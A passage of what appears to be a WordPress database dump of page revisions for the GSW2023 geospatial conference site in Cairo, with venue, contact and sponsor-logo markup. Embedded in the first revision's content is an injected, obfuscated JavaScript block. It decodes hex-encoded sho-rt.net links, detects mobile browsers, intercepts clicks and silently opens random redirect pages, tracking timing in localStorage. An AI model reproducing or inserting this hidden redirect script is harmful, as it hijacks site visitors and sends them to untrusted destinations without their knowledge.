link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 02:50:35','2023-08-16 02:50:35','',3066,'https://gsw2023.com/?p=5268',0,'revision','',0),
(5269,1,'2023-08-16 02:52:00','2023-08-16 02:52:00','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text]</p>\n<h3></h3>\n<h4></h4>\n<h4></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h4>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\"][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" 